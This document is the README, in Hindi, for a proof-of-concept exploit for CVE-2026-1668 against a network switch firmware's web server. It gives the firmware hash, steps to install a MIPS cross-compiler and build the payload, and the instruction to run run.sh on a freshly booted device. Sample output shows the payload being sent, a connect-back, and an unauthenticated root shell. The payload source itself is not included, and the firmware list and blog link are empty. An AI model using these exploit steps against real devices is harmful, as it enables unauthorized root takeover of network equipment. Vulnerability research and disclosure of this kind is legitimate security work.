
CVE-2026-1668 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट।
यह CVE-2026-1668 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है। यह केवल शैक्षिक उद्देश्यों के लिए है। कृपया उन सिस्टमों का शोषण करने का प्रयास न करें जिनके आप स्वामी नहीं हैं या जिनके लिए आपके पास स्पष्ट अनुमति नहीं है।
इस प्रूफ-ऑफ-कॉन्सेप्ट को निम्नलिखित SHA256 हैश वाली फर्मवेयर इमेज के विरुद्ध विकसित किया गया था: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544।
उस हैश से मेल खाने वाले ज्ञात फर्मवेयरों के नाम (अपूर्ण सूची):
पुराने फर्मवेयर संस्करण भी संभवतः इस भेद्यता से प्रभावित हैं, लेकिन उनमें एक्सप्लॉइट पेलोड में मामूली बदलाव की आवश्यकता हो सकती है।
पेलोड कैसे काम करता है, इसका विवरण इस ब्लॉग पोस्ट में पाया जा सकता है।
पेलोड बनाने के लिए MIPS Linux GCC टूलचेन की आवश्यकता होती है। Ubuntu 24.04 पर, इसे sudo apt install gcc-mips-linux-gnu से स्थापित किया जा सकता है।
$ make
यह एक्सप्लॉइट HTTP सर्वर द्वारा अपना पहला अनुरोध पूरा करने से पहले चलाया जाना चाहिए (अर्थात एक नए बूट पर)।
$ ./run.sh
स्क्रिप्ट आपको रूट शेल में पहुँचा देनी चाहिए। यदि नहीं, तो एक्सप्लॉइट विफल हो गया है।
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #